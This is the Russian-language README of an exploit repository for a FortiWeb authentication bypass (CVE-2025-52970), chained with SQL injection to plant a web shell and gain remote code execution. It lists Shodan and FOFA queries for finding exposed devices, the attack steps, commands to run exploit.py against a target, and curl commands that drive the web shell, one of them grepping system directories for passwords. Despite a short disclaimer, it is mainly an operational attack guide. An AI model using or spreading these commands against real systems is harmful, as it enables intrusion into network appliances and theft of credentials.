
Демонстрирует обход аутентификации в FortiWeb (CVE-2025-52970) в связке с SQL-инъекцией для загрузки веб-шелла и достижения удалённого выполнения кода через HTTP-заголовки.
В этом репозитории демонстрируется обход аутентификации в FortiWeb, который можно объединить в цепочку для достижения удалённого выполнения кода (RCE).
Эксплойт использует уязвимую конечную точку для внедрения SQL-нагрузок, загрузки веб-шелла и выполнения команд через HTTP-заголовки.
⚠️ Предупреждение:
Этот проект предназначен только для образовательных и исследовательских целей.
НЕ используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
((FortiWeb)) AND port:("8443")
### FOFA
title="FortiWeb" && port="8443"
### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
CVE: CVE-2025-52970
Компонент: FortiWeb Fabric API (/api/fabric/device/status)
Воздействие: Обход аутентификации → SQL-инъекция → Загрузка веб-шелла → RCE
Вектор: Специально сформированный заголовок Authorization + SQL-инъекция
Создать и удалить временную SQL-таблицу.
Записать нагрузку веб-шелла по частям.
Экспортировать шелл в /cgi-bin/x.cgi.
Загрузить вспомогательный Python-скрипт для активации прав доступа.
Получить доступ к веб-шеллу, отправляя команды через заголовок User-Agent.
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/
3️⃣ Взаимодействие с веб-шеллом
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
